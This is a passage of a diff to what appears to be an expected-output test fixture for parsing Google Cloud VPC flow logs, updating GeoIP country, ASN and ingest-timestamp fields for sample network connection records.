"{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", @@ -20345,11 +21315,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53106, 
@@ -20421,7 +21396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392304100Z", + "ingested": "2021-12-14T14:43:27.415279838Z", "original": "{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", @@ -20437,11 +21412,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -20519,7 +21499,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392309600Z", + "ingested": "2021-12-14T14:43:27.415280346Z", "original": "{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", @@ -20541,11 +21521,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -20617,7 +21602,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392315200Z", + "ingested": "2021-12-14T14:43:27.415280736Z", "original": "{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", 
@@ -20628,9 +21613,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.553Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.12", + "10.73.186.17" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST" + } + }, "destination": { "address": "10.73.186.17", "port": 22, 
@@ -20653,6 +21665,16 @@ "ip": "192.168.2.12", "packets": 2 }, + "event": { + "ingested": "2021-12-14T14:43:27.415281124Z", + "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:45:22.080963433Z", + "end": "2019-06-14T03:45:22.318564382Z", + "id": "19im82tfdygzoc", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -20664,43 +21686,6 @@ "iana_number": "6", "packets": 2, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:17.553Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.12", - "10.73.186.17" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST" - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392319600Z", - "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:45:22.080963433Z", - "end": "2019-06-14T03:45:22.318564382Z", - "id": "19im82tfdygzoc", - "category": "network", - "type": "connection" } }, { 
@@ -20709,11 +21694,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33542, @@ -20791,7 +21781,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392324300Z", + "ingested": "2021-12-14T14:43:27.415281592Z", "original": "{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", 
@@ -20813,11 +21803,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33560, @@ -20889,7 +21884,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392330Z", + "ingested": "2021-12-14T14:43:27.415281980Z", "original": "{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", 
@@ -20911,11 +21906,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33564, @@ -20987,7 +21987,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392335500Z", + "ingested": "2021-12-14T14:43:27.415282488Z", "original": "{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", 
@@ -21085,7 +22085,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392341Z", + "ingested": "2021-12-14T14:43:27.415282939Z", "original": "{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", @@ -21101,11 +22101,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33550, 
@@ -21183,7 +22188,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392346600Z", + "ingested": "2021-12-14T14:43:27.415283393Z", "original": "{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143811431Z", 
@@ -21194,43 +22199,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41822, - "bytes": 0, - "ip": "67.43.156.14", - "packets": 8 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 8, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -21241,6 +22209,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -21261,8 +22232,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41822, + "bytes": 0, + "ip": "67.43.156.14", + "packets": 8 + }, "event": { - "ingested": "2021-12-09T13:37:46.392352100Z", + "ingested": "2021-12-14T14:43:27.415283920Z", "original": "{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", 
@@ -21270,6 +22266,18 @@ "id": "19im82tfdygzne", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 8, + "direction": "inbound" } }, { @@ -21278,11 +22286,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -21360,7 +22373,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392357700Z", + "ingested": "2021-12-14T14:43:27.415284409Z", "original": "{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", @@ -21376,11 +22389,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33970, 
@@ -21458,7 +22476,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392363200Z", + "ingested": "2021-12-14T14:43:27.415284849Z", "original": "{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", @@ -21480,11 +22498,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
